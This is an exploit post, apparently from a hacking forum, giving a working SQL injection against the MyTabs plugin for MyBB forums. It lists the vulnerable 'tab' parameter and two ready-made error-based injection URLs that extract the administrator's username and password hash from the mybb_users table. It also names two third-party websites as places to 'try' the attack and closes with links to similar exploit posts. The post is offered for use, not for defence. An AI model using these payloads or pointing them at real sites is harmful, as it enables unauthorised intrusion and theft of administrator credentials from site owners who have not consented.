MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

You can try on this site

http://secworm.net/forums/index.php?tab=1'
http://icanhazcookie.net/index.php?tab=1'

» MyBB 0day \ MyTabs (plugin) Blind SQL injection vulnerability
» Threaded Mode | Linear Mode WordPress SendIt plugin 1.5.9 Blind SQL Injection Vulnerability
» Wordpress Plugin EasyComment Upload Vulnerability
» Webit Cms SQL Injection Vulnerability
» WEBANDHOST CMS SQL Injection Vulnerability